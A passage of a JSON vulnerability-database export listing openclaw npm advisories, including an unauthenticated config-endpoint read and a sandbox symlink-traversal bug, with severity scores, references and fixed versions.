/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T17:54:53Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wpg9-4g4v-f9rc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["CVE-2026-32035","GHSA-wpg9-4g4v-f9rc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dzmz-c5en-5qeq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/93521?format=json","vulnerability_id":"VCID-e25p-j5ed-yqfz","summary":"OpenClaw's Gateway Control UI bootstrap config required Gateway auth\n## Summary\nGateway Control UI bootstrap config required Gateway auth.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nWhen Gateway authentication was enabled, the Control UI bootstrap config endpoint could still be read without a valid Gateway token. That response could expose sensitive bootstrap/config fields intended only for authenticated Control UI sessions.\n\n## Fix\nThe bootstrap config route now goes through the same Gateway read-auth path as other authenticated Control UI reads. Regression tests cover unauthenticated rejection, valid-token access, and basePath handling.\n\n## Fix Commit(s)\n- 2321d67263bc710e357644d59f746b08d891051b\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @zsxsoft for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2321d67263bc710e357644d59f746b08d891051b","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/2321d67263bc710e357644d59f746b08d891051b"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-93rg-2xm5-2p9v","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-93rg-2xm5-2p9v"},{"reference_url":"https://github.com/advisories/GHSA-93rg-2xm5-2p9v","reference_id":"GHSA-93rg-2xm5-2p9v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-93rg-2xm5-2p9v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114466?format=json","purl":"pkg:npm/openclaw@2026.4.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-ye4t-n6r3-67ab"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"}],"aliases":["GHSA-93rg-2xm5-2p9v"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e25p-j5ed-yqfz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50636?format=json","vulnerability_id":"VCID-e31s-2etq-6fdq","summary":"OpenClaw: stageSandboxMedia destination symlink traversal can overwrite files outside sandbox workspace\n`stageSandboxMedia` allowed destination symlink traversal during media staging, which could overwrite files outside the sandbox workspace root.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31990","reference_id":"","reference_type":"","scores":[{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11821","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11856","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11862","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31990"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/17ede52a4be3034f6ec4b883ac6b81ad0101558a","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-19T17:02:57Z/"}],"url":"https://github.com/openclaw/openclaw/commit/17ede52a4be3034f6ec4b883ac6b81ad0101558a"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-symlink-traversal-in-stagesandboxmedia-destination","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-19T17:02:57Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-symlink-traversal-in-stagesandboxmedia-destination"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31990","reference_id":"CVE-2026-31990","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31990"},{"reference_url":"https://github.com/advisories/GHSA-cfvj-7rx7-fc7c","reference_id":"GHSA-cfvj-7rx7-fc7c","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cfvj-7rx7-fc7c"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cfvj-7rx7-fc7c","reference_id":"GHSA-cfvj-7rx7-fc7c","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-19T17:02:57Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cfvj-7rx7-fc7c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-